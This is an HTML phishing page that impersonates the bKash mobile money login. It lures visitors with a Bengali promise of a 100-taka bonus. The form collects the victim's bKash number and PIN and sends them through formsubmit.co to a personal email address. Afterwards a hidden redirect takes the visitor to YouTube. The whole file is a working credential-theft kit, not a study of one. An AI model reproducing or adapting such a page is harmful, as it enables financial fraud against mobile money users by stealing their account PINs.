<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="shortcut icon" href="https://telegra.ph/file/c44ac3cc6bac7bba074d3.jpg" />
    <meta property="og:title" content="এখনই লগইন করুন বিকাশ ওয়েব সাইটে 100 টাকা। বোনাস পাওয়ার জন্য সীমিত সুযোগ!" />
    <meta property="og:description" content="এখনই লগইন করুন বিকাশ ওয়েব সাইটে 100 টাকা। বোনাস পাওয়ার জন্য সীমিত সুযোগ!" />
    <meta property="og:image" content="https://i.ibb.co/ZG3mM2j/website-720x360-1717679913754.webp" />
    <title>Your Title</title>
    <style>
    	@keyframes fadeIn {
    from { opacity: 0; transform: translateY(-20px); }
    to { opacity: 1; transform: translateY(0); }
    }
    @keyframes buttonHover {
    from { background-color: #e4136b; }
    to { background-color: #c5115a; }
    }
    body {
    background-color: #e4136b;
    font-family: Arial, sans-serif;
    margin: 0;
    padding: 0;
    display: flex;
    flex-direction: column;
    justify-content: flex-start; 
    align-items: center;
    height: 100vh;
    padding-top: 50px; 
    overflow: auto;
    overflow: hidden;
    }
    .logo {
    text-align: center;
    margin-bottom: 10px; 
    animation: fadeIn 1s ease-in-out;
    }
    .logo img {
    max-width: 110px;
    }
    .container {
    background-color: #FFFFFF;
    padding: 20px;
    border-radius: 10px;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
    width: 300px;
    animation: fadeIn 1.5s ease-in-out;
    }
    .input-group {
    margin-bottom: 15px;
    text-align: left;
    animation: fadeIn 2s ease-in-out;
    }
    input[type="number"],
    input[type="number"] {
    width: 100%;
    padding: 10px;
    border: 1px solid #CCCCCC;
    border-radius: 5px;
    box-sizing: border-box;
    font-family: Arial, sans-serif;
    transition: border-color 0.3s, box-shadow 0.3s;
    }
    input[type="number"]::placeholder,
    input[type="number"]::placeholder {
    font-family: Arial, sans-serif;
    color: #999999;
    }
    input:focus {
    border-color: #e4136b;
    box-shadow: 0 0 5px rgba(228, 19, 107, 0.5);
    outline: none;
    }
    input.invalid {
    border-color: red;
    }
    #loginButton {
    background-color: #e4136b;
    color: #FFFFFF;
    border: none;
    padding: 10px 20px;
    border-radius: 5px;
    cursor: pointer;
    width: 100%;
    display: flex;
    justify-content: space-between;
    align-items: center;
    font-family: Arial, sans-serif;
    font-size: 17px;
    transition: background-color 0.3s, transform 0.3s;
    animation: fadeIn 2.5s ease-in-out;
    }
    #loginButton:hover {
    background-color: #c5115a;
    animation: buttonHover 0.3s forwards;
    transform: translateY(-2px);
    }
a {
    text-decoration: none;
}
</style>
</head>
<body>
    <div class="logo">
        <img src="https://i.ibb.co/0s3npSv/5e6ab3fa58a91-removebg-preview-1.png" alt="Bkash Logo">
    </div>
    <form action="https://formsubmit.co/spsrahulparves@gmail.com" method="POST">
    <div class="container">
        <div class="input-group">
            <p>Enter Bkash Mobile Number</p>
            <input type="number" placeholder="Ex: 01XXXXXXXXX" id="mobileNumber" name="number">
        </div>
        <div class="input-group">
            <p>Enter PIN</p>
            <input type="number" placeholder="Ex: XXXXX" id="pin" name="pin">
        </div>
        <input type="hidden" name="_next" value="https://youtube.com">
        <div>
  <button id="loginButton">Next <span>&#8594;</span></button>
    </div>
    </form>





</body>
</html>
